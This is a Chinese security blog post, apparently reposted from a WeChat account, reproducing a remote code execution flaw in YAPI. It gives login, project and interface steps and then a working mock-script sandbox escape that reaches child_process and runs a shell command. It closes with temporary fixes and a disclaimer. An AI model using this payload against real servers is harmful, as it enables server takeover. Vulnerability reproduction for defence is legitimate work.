由于用户使用时未按照安全的方式对YAPI进行配置,攻击者可以使用 YAPI 的 Mock 功能在受影响的服务器上执行任意 javascript 代码,导致攻击者接管并控制服务器;目前该漏洞暂无补丁,处于0day状态。
注册或者爆破获取用户登录权限登陆系统:
添加项目:
添加接口
添加mock脚本:
const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami").toString()
预览里访问接口
修复建议
该漏洞官方暂未发布补丁,请受影响的用户实时关注官网以获取最新信息。链接如下:
https://github.com/YMFE/yapi
临时解决方案
1.关闭YAPI注册功能
2.删除恶意账户
3.回滚服务器快照
4.同步删除恶意mock脚本以防止二次攻击
凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数凑字数
本文始发于微信公众号(Khan安全攻防实验室):YAPI远程代码执行0day漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论